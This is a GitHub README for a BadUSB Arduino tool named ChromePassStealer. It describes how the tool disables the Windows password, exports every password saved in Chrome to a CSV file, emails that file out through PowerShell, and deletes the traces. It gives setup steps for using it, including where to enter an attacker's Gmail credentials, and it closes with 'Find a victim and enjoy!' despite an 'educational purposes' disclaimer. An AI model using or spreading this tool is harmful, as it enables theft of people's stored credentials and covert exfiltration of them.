🚨 This project is no longer updated. If you want a better script, click here.
Everything in this repository is strictly for educational purposes. I am not responsible for any stolen data. You are responsible for your actions when using this script with BadUSB.
Many people who are not well-informed about cybersecurity save their passwords in Google Chrome for convenience. This script exploits this weakness to steal all saved passwords.
1️⃣ Disables Windows password using PowerShell.
2️⃣ Opens Google Chrome and downloads a .csv file containing all saved passwords.
3️⃣ Sends the file by email via PowerShell.
4️⃣ Deletes traces by removing the file and closing Chrome.
Sometimes, you might see this in the code:
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll();
This is used to type characters like @
or \
, but it depends on the keyboard layout. 👉 Adapt these characters using this ASCII table or simply switch the keyboard layout to French.
You can customize the delay based on how fast you plug in the BadUSB.
✔️ A BadUSB
✔️ Install Arduino software here
✔️ A Gmail account with "Less Secure Apps" enabled here (if required)
1️⃣ Download this repository
🔹 Linux:
git clone https://github.com/tuconnaisyouknow/ChromePassStealer
cd ChromePassStealer
🔹 Windows:
- Click the green "Code" button at the top right.
- Click "Download ZIP" and extract it.
2️⃣ Replace your email and password in: ChromePassStealer.ino
(Lines 238, 245, 253, 264)
3️⃣ Upload the script to your BadUSB using Arduino software.
4️⃣ Find a victim and enjoy! 🎭
✔️ Turn off Caps Lock
✔️ Switch the keyboard layout to French (or adapt the code accordingly)
I want to make the script run in the background and perform all actions from Chrome directly via PowerShell. If you have any ideas, feel free to contribute! 🚀